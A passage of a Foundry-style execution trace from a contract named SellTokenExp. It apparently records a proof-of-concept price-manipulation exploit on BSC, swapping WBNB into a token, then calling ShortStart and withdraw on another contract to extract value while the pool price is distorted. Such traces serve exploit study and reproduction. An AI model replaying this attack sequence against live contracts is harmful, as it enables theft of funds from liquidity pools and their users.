    │   │   │   └─ ← [Stop]
    │   │   ├─ [2420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2620] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   └─ ← [Return] true
    │   │   ├─ [54754] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(423190726596813126266 [4.231e20], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683963033 [1.683e9])
    │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 10131261910696925365107624 [1.013e25], 421005108701970988373 [4.21e20], 1683961933 [1.683e9]
    │   │   │   ├─ [3425] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x358EfC593134f99833C66894cCeCD41F550051b6, 423190726596813126266 [4.231e20])
    │   │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 423190726596813126266 [4.231e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000016f0f37bade27ffa7a → 0
    │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x000000000000000000000000000000000000000000000016d29e9bc8a5b27d55 → 0x00000000000000000000000000000000000000000000002dc3921776883277cf
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41967] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(5072405901456677064951523 [5.072e24], 0, SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [25959] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5072405901456677064951523 [5.072e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5072405901456677064951523 [5.072e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000004321facc68894ec1046e3
    │   │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x000000000000000000000000000000000000000000086160cf05a4ba2d417ba8 → 0x000000000000000000000000000000000000000000042f41223f1c25413134c5
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 844195835298784114639 [8.441e20]
    │   │   │   │   ├─ emit Sync(reserve0: 5058856009240248300156101 [5.058e24], reserve1: 844195835298784114639 [8.441e20])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 423190726596813126266 [4.231e20], amount0Out: 5072405901456677064951523 [5.072e24], amount1Out: 0, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x000000000000000000000000000bf6183be6cf3c2b73d7e54f72ecfdc9de71bb → 0x000000000000000000000000000bf63cf4151f0bf0b7fabbb12b91f16d17ca87
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000000083626d3108cc1767618bd027001f56 → 0x000000000000000000000000000000000083637d86d770bb2565bfc7b4aac246
    │   │   │   │   │   @ 8: 0x645f384d000000000016d29e9bc8a5b27d55000000086160cf05a4ba2d417ba8 → 0x645f38b100000000002dc3921776883277cf000000042f41223f1c25413134c5
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [423190726596813126266 [4.231e20], 5072405901456677064951523 [5.072e24]]
    │   │   ├─ [343941] 0x57Db19127617B77c8abd9420b5a35502b59870D6::ShortStart{value: 4274653804008213397}(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   │   ├─ [602] 0x8D190C70937493046a464440d28f126A4E42eF7f::getPair(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4) [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c
    │   │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(1000000000000000000 [1e18], [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24], 844195835298784114639 [8.441e20], 1683962033 [1.683e9]
    │   │   │   │   └─ ← [Return] [1000000000000000000 [1e18], 166457629576912 [1.664e14]]
    │   │   │   ├─ [2586] 0x8D190C70937493046a464440d28f126A4E42eF7f::balanceOf(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4) [staticcall]
    │   │   │   │   └─ ← [Return] 15917150134720644674378854 [1.591e25]
    │   │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(15917150134720644674378854 [1.591e25], [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24], 844195835298784114639 [8.441e20], 1683962033 [1.683e9]
    │   │   │   │   └─ ← [Return] [15917150134720644674378854 [1.591e25], 640211231226325259630 [6.402e20]]
    │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(4189160727928049129 [4.189e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24], 844195835298784114639 [8.441e20], 1683962033 [1.683e9]
    │   │   │   │   └─ ← [Return] [4189160727928049129 [4.189e18], 24917509241062720965794 [2.491e22]]
    │   │   │   ├─ [55] 0x8D190C70937493046a464440d28f126A4E42eF7f::fallback{value: 4146414189887966995}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [100198] 0x8D190C70937493046a464440d28f126A4E42eF7f::buy(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 4146414189887966995 [4.146e18])
    │   │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(4146414189887966995 [4.146e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4]) [staticcall]
    │   │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24], 844195835298784114639 [8.441e20], 1683962033 [1.683e9]
    │   │   │   │   │   └─ ← [Return] [4146414189887966995 [4.146e18], 24664488590584555724398 [2.466e22]]
    │   │   │   │   ├─ [2562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x8D190C70937493046a464440d28f126A4E42eF7f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1020918279703444674378854 [1.02e24]
    │   │   │   │   ├─ [64569] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokensSupportingFeeOnTransferTokens{value: 4146414189887966995}(20964815301996872365738 [2.096e22], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4], 0x8D190C70937493046a464440d28f126A4E42eF7f, 1683962033 [1.683e9])
    │   │   │   │   │   ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 4146414189887966995}()
    │   │   │   │   │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 4146414189887966995 [4.146e18])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000000398b05bcafe94f13
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x358EfC593134f99833C66894cCeCD41F550051b6, 4146414189887966995 [4.146e18])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 4146414189887966995 [4.146e18])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000000398b05bcafe94f13 → 0
    │   │   │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x00000000000000000000000000000000000000000000002dc3921776883277cf → 0x00000000000000000000000000000000000000000000002dfd1d1d33381bc6e2
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x8D190C70937493046a464440d28f126A4E42eF7f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1020918279703444674378854 [1.02e24]
    │   │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 5058856009240248300156101 [5.058e24], 844195835298784114639 [8.441e20], 1683962033 [1.683e9]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 848342249488672081634 [8.483e20]
    │   │   │   │   │   ├─ [21183] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(24664488590584555724398 [2.466e22], 0, 0x8D190C70937493046a464440d28f126A4E42eF7f, 0x)
    │   │   │   │   │   │   ├─ [6059] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transfer(0x8D190C70937493046a464440d28f126A4E42eF7f, 24664488590584555724398 [2.466e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: 0x8D190C70937493046a464440d28f126A4E42eF7f, value: 24664488590584555724398 [2.466e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xf937d4bbf099d4b006a4433eb94a61b451b2d4449f1f85edbab4c62c4e5768fe: 0x00000000000000000000000000000000000000000000d83017413d6a545cfc66 → 0x00000000000000000000000000000000000000000000dd6927cb3c7da7c85ad4
    │   │   │   │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x000000000000000000000000000000000000000000042f41223f1c25413134c5 → 0x000000000000000000000000000000000000000000042a0811b51d11edc5d657
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5034191520649663744431703 [5.034e24]
    │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 848342249488672081634 [8.483e20]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 5034191520649663744431703 [5.034e24], reserve1: 848342249488672081634 [8.483e20])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 4146414189887966995 [4.146e18], amount0Out: 24664488590584555724398 [2.466e22], amount1Out: 0, to: 0x8D190C70937493046a464440d28f126A4E42eF7f)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x645f38b100000000002dc3921776883277cf000000042f41223f1c25413134c5 → 0x645f38b100000000002dfd1d1d33381bc6e2000000042a0811b51d11edc5d657
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x8D190C70937493046a464440d28f126A4E42eF7f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1045582768294029230103252 [1.045e24]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x8D190C70937493046a464440d28f126A4E42eF7f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1045582768294029230103252 [1.045e24]
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x8D190C70937493046a464440d28f126A4E42eF7f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1045582768294029230103252 [1.045e24]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2b935c4b73d8bbe2cf89a1a274a236c63ef4392dbb5a85e1319c08e366846d95: 0x0000000000000000000000000000000000000000000d2a96701324ad60725c66 → 0x0000000000000000000000000000000000000000000d2fcf809d23c0b3ddbad4
    │   │   │   │   │   @ 0x90ad3b863db417cddda4869d67f0028b3acada2341a2563e1a13177596152afb: 0x00000000000000000000000000000000000000000001fea9640a6bef3ff0838a → 0x0000000000000000000000000000000000000000000203e274946b02935be1f8
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x20D815e42eCDEfF5cC14B142DF817825B15b88dD::fallback{value: 85493076080164267}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x20D815e42eCDEfF5cC14B142DF817825B15b88dD::fallback{value: 42746538040082133}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c73: 0 → 0x000000000000000000000000000000000000000000000546c7e7ec1fe0ba8ca2
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82b: 0 → 1
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 1
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c70: 0 → 0x000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c
    │   │   │   │   @ 0x05145675fdbf74716caf81bfeeff2666c82ac1f59fe4fdbb2aa3d6034769c35b: 0x0000000000000000000000000000000000000000000000000000943a5d937c56 → 0
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c74: 0 → 0x00000000000000000000000000000000000000000000000000000000645f38b1
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c72: 0 → 0x0000000000000000000000000000000000000000000000003a22e37ca72b0de9
    │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66187: 0 → 0x000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade4
    │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000012b472d0313d31e036 → 0x000000000000000000000000000000000000000000000012efc56f2dd2e06bcb
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c71: 0 → 0x000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade4
    │   │   │   └─ ← [Stop]
    │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 5072405901456677064951523 [5.072e24]
    │   │   ├─ [31678] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(5072405901456677064951523 [5.072e24], 0, [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683963033 [1.683e9])
    │   │   │   ├─ [3627] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transferFrom(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x358EfC593134f99833C66894cCeCD41F550051b6, 5072405901456677064951523 [5.072e24])
    │   │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 5072405901456677064951523 [5.072e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000004321facc68894ec1046e3 → 0
    │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x000000000000000000000000000000000000000000042a0811b51d11edc5d657 → 0x000000000000000000000000000000000000000000085c27be7ba5a6d9d61d3a
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 5034191520649663744431703 [5.034e24], 848342249488672081634 [8.483e20], 1683962033 [1.683e9]
    │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   └─ ← [Return] 10106597422106340809383226 [1.01e25]
    │   │   │   ├─ [18386] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(0, 425244099411480919497 [4.252e20], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 425244099411480919497 [4.252e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 425244099411480919497 [4.252e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x00000000000000000000000000000000000000000000002dfd1d1d33381bc6e2 → 0x000000000000000000000000000000000000000000000016efaa95d33be40919
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000170d72875ffc37bdc9
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10106597422106340809383226 [1.01e25]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 423098150077191162137 [4.23e20]
    │   │   │   │   ├─ emit Sync(reserve0: 10106597422106340809383226 [1.01e25], reserve1: 423098150077191162137 [4.23e20])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 5072405901456677064951523 [5.072e24], amount1In: 0, amount0Out: 0, amount1Out: 425244099411480919497 [4.252e20], to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x645f38b100000000002dfd1d1d33381bc6e2000000042a0811b51d11edc5d657 → 0x645f38b1000000000016efaa95d33be40919000000085c27be7ba5a6d9d61d3a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 425244099411480919497 [4.252e20]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [108524] 0x57Db19127617B77c8abd9420b5a35502b59870D6::withdraw(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4)
    │   │   │   ├─ [586] 0x8D190C70937493046a464440d28f126A4E42eF7f::balanceOf(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4) [staticcall]
    │   │   │   │   └─ ← [Return] 15941814623311229230103252 [1.594e25]
    │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(4189160727928049129 [4.189e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 10106597422106340809383226 [1.01e25], 423098150077191162137 [4.23e20], 1683962033 [1.683e9]
    │   │   │   │   └─ ← [Return] [4189160727928049129 [4.189e18], 98840638819487160139602 [9.884e22]]
    │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(16617203527853764395 [1.661e19], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 10106597422106340809383226 [1.01e25], 423098150077191162137 [4.23e20], 1683962033 [1.683e9]
    │   │   │   │   └─ ← [Return] [16617203527853764395 [1.661e19], 381017754148712581746638 [3.81e23]]
    │   │   │   ├─ [76883] 0x8D190C70937493046a464440d28f126A4E42eF7f::6ffe492e(000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade4000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c0000000000000000000000000000000000000000000050af038b07ac9b04cfce0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   │   │   ├─ [4720] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: 0x8D190C70937493046a464440d28f126A4E42eF7f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [67317] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETHSupportingFeeOnTransferTokens(381017754148712581746638 [3.81e23], 0, [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683962033 [1.683e9])
    │   │   │   │   │   ├─ [3627] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transferFrom(0x8D190C70937493046a464440d28f126A4E42eF7f, 0x358EfC593134f99833C66894cCeCD41F550051b6, 381017754148712581746638 [3.81e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x8D190C70937493046a464440d28f126A4E42eF7f, to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 381017754148712581746638 [3.81e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x000000000000000000000000000000000000000000085c27be7ba5a6d9d61d3a → 0x00000000000000000000000000000000000000000008acd6c206ad5374daed08
    │   │   │   │   │   │   │   @ 0xf937d4bbf099d4b006a4433eb94a61b451b2d4449f1f85edbab4c62c4e5768fe: 0x00000000000000000000000000000000000000000000dd6927cb3c7da7c85ad4 → 0x000000000000000000000000000000000000000000008cba244034d10cc38b06
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 10106597422106340809383226 [1.01e25], 423098150077191162137 [4.23e20], 1683962033 [1.683e9]
    │   │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 10487615176255053391129864 [1.048e25]
    │   │   │   │   │   ├─ [38286] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(0, 15334229087419300293 [1.533e19], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 15334229087419300293 [1.533e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 15334229087419300293 [1.533e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000000d4ce201c5c16f9c5
    │   │   │   │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x000000000000000000000000000000000000000000000016efaa95d33be40919 → 0x0000000000000000000000000000000000000000000000161adc75b6dfcd0f54
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10487615176255053391129864 [1.048e25]
    │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 407763920989771861844 [4.077e20]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 10487615176255053391129864 [1.048e25], reserve1: 407763920989771861844 [4.077e20])
